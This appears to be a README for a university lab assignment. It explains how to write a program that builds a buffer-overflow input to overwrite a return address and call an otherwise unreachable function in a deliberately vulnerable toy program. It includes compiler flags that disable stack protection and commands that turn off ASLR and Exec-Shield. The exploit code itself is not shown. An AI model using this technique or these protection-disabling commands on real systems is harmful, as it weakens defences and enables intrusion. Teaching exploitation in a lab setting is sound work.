Buffer Overflow Attack to run unreachable code.

Buffer Overflow Attack to run unreachable code.

The attak-string program wil generate a string used to cause a buffer overflow in a vulnerable program and have it to call a function. Based on the buffer size in the porgram, the attack program will generate enough characters to fill the buffer and the saved frame pointer. The program then will add the address of the target function to the end of the attack string, overriding the return address of the current function. When the vulnerable program runs with the attack string as nut, it will call the target function at the return. The address will be generated based on the endianness of the machine.

Example Demo htaexploit

Example Demo htaexploit

Installation and Usage:
Step 1:
Use the vulnerable source code at the end of the assignment. Compile it with:
gcc ./vuln_program.c -fno-stack-protector -z execstack -static -o vuln_program

Step 2: Disable protections on your VM (use a 32 bit VM)
To make your job easier, you should disable address space layout randomization (ASLR). On Ubuntu-based systems, run the following command:
sudo sysctl -w kernel.randomize_va_space=0

If you are working on a RedHat-based system (e.g., RHE or Fedora), you will also need to disable Execshield, as follows:
sudo sysctl -w kernel.exec-shield=0

Step 3: Crash the program.
Run the program vuln_program and provide a long input to cause it to crash. How long an input do you need? You can use the source code to analyze why that makes sense. You may also want to use “objdump -D ./vuln_program” or gdb to figure it out.
This article may be of help: Examining a Buffer Overflow in C and assembly with gdb. You may also find this gdb cheat sheet helpful.

Step 4: Exploit the overflow
Now that you understand what’s going on, write an exploit that, instead of causing a crash, causes the program to print out “Haha! I made it!”. There’s an existing function target in the executable that prints this. So all you need to do is use the buffer overflow to overwrite return address on the stack to point to target’s address.
In your program, you will need to write a separate program to generate the attack string into a file, say, “attack.input”. You then run the program as “./vuln-program < ./attack.input” to see whether you can exploit the code to print “Haha! I made it!” without crashing the program.

You can choose any programming language for this assignment, as long as it generates the attack string correctly. You will need to submit a separate readme file that describes the details about why that specific attack string is chosen. We will hand out submission guidelines later.
In your submission, you will need to provide the program that generates the attack string. Given that the address of the target function is X, your program runs as “./attack-string X > ./attack.input”, which generates the attack string to file attack.input. If your hack string is correct, the message “Haha! I made it!” will be printed without crashing the program.

Grading: You will need to come to my office to demonstrate the attack within five minutes, using the code you have submitted at Blackboard. Each extra minute will cost you five points. You will have to finish the attack within 15 minutes.

attack-string.cpp Script:

vuln_program.c Script:

Source: https://github.com/TakLun